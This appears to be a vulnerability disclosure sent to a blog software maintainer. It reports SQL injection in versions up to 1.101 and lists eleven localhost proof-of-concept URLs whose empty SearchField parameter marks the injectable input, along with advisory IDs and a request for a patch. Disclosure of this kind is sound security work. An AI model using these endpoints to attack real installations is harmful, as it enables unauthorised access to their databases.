Originally these vulnerabilities have been reported by muuratsalo in here http://seclists.org/fulldisclosure/2011/Nov/302 (or another mailing list archive link: http://www.securityfocus.com/archive/1/520571\). Do you have plans to patch these security vulnerabilities?
Affected versions: <= 1.101
Proof of concept addresses:
http://localhost/blogs/_authors_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/_blogs_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/_category_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/_comments_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/_policy_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/_rate_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/categoriesblogs_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/chosen_authors_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/chosen_blogs_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/chosen_comments_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
http://localhost/blogs/help_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=
OSVDB IDs: 1167174,1167222,1167223,1167224,1167225,1167226,1167227,1167228,1167229,1167230,1167231
Secunia: SA46918
More information about SQL-injection security vulnerability: https://www.owasp.org/index.php/SQL_Injection
In case you have any questions please contact me!
